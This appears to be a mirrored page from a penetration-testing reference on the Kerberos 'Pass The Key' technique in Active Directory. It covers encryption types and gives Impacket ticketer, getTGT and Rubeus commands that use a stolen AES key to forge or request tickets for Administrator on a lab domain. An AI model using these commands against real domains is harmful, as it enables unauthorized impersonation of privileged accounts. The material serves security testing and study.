hash-pass-the-key.md (3420B)
1 --- 2 title: "Hash - Pass The Key" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/hash-pass-the-key.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/hash-pass-the-key.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Hash - Pass The Key 12 13 Pass The Key allows attackers to gain access to systems by using a valid session key instead of the user's password or NTLM hash. This technique is related to other credential-based attacks like Pass The Hash (PTH) and Pass The Ticket (PTT) but specifically uses session keys to authenticate. 14 15 Pre-authentication requires the requesting user to provide a secret key, which is derived from their password and may use encryption algorithms such as DES, RC4, AES128, or AES256. 16 17 * **RC4**: ARCFOUR-HMAC-MD5 (23), in this format, this is the NTLM hash, go to **Pass The Hash** to use it directly and **Over Pass The Hash** page to request a TGT from it. 18 * **DES**: DES3-CBC-SHA1 (16), should not be used anymore and have been deprecated since 2018 ([RFC 8429](https://www.rfc-editor.org/rfc/rfc8429)). 19 * **AES128**: AES128-CTS-HMAC-SHA1-96 (17), both AES encryption algorithms can be used with Impacket and Rubeus tools. 20 * **AES256**: AES256-CTS-HMAC-SHA1-96 (18) 21 22 In the past, there were more encryptions methods, that have now been deprecated. 23 24 | enctype | weak? | krb5 | Windows | 25 | -------------------------- | ----- | ------ | ------- | 26 | des-cbc-crc | weak | <1.18 | >=2000 | 27 | des-cbc-md4 | weak | <1.18 | ? | 28 | des-cbc-md5 | weak | <1.18 | >=2000 | 29 | des3-cbc-sha1 | | >=1.1 | none | 30 | arcfour-hmac | | >=1.3 | >=2000 | 31 | arcfour-hmac-exp | weak | >=1.3 | >=2000 | 32 | aes128-cts-hmac-sha1-96 | | >=1.3 | >=Vista | 33 | aes256-cts-hmac-sha1-96 | | >=1.3 | >=Vista | 34 | aes128-cts-hmac-sha256-128 | | >=1.15 | none | 35 | aes256-cts-hmac-sha384-192 | | >=1.15 | none | 36 | camellia128-cts-cmac | | >=1.9 | none | 37 | camellia256-cts-cmac | | >=1.9 | none | 38 39 Microsoft Windows releases Windows 7 and later disable single-DES enctypes by default. 40 41 Either use the AES key to generate a ticket with `ticketer`, or request a new TGT using `getTGT.py` script from Impacket. 42 43 ## Generate a new ticket 44 45 * [fortra/impacket/ticketer.py](https://github.com/fortra/impacket/blob/master/examples/ticketer.py) 46 47 ```powershell 48 impacket-ticketer -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 -domain lab.local Administrator -domain-sid S-1-5-21-2218639424-46377867-3078535060 49 ``` 50 51 ## Request a TGT 52 53 * [fortra/impacket/getTGT.py](https://github.com/fortra/impacket/blob/master/examples/getTGT.py) 54 55 ```powershell 56 impacket-getTGT -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 lab.local 57 ``` 58 59 * [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus) 60 61 ```powershell 62 .\Rubeus.exe asktgt /user:Administrator /aes128 bc09f84dcb4eabccb981a9f265035a72 /ptt 63 .\Rubeus.exe asktgt /user:Administrator /aes256:2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 /opsec /ptt 64 ``` 65 66 ## References 67 68 * [MIT Kerberos Documentation - Encryption types](https://web.mit.edu/kerberos/krb5-1.18/doc/admin/enctypes.html)